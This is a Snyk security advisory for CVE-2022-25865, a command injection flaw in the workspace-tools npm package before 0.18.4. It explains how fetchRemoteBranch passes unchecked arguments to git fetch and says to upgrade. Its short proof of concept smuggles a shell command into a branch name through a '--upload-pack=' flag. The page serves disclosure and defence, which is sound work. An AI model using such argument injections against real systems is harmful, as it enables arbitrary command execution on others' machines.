Command Injection Affecting workspace-tools Open this link in a new tab package, versions <0.18.4
Exploit Maturity
Proof of concept
Attack Complexity
High
Confidentiality
High
Integrity
High
Availability
High
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications-
snyk-id
SNYK-JS-WORKSPACETOOLS-2421201
-
published
11 May 2022
-
disclosed
11 Mar 2022
-
credit
Alessio Della Libera of Snyk Research Team
Introduced: 11 Mar 2022
CVE-2022-25865 Open this link in a new tabHow to fix?
Upgrade workspace-tools
to version 0.18.4 or higher.
Overview
workspace-tools is a JS Monorepo Workspace Tools.
Affected versions of this package are vulnerable to Command Injection via git argument injection. When calling the fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string)
function, both the remote
and remoteBranch
parameters are passed to the git fetch
subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injection.
PoC
const workspace_tools = require("workspace-tools");
workspace_tools.init("./", "username", "password") // or git init
let remote1 = "origin";
let remoteBranch1 = "--upload-pack=touch HELLO1;";
workspace_tools.fetchRemoteBranch(remote1, remoteBranch1, "./") // git [ 'fetch', 'origin', '--upload-pack=touch HELLO1;' ]
// let remote2 = "--upload-pack=touch HELLO2;";
// let remoteBranch2 = "foo";
// workspace_tools.fetchRemoteBranch(remote2, remoteBranch2, "./") // git [ 'fetch', '--upload-pack=touch HELLO2;', 'foo' ]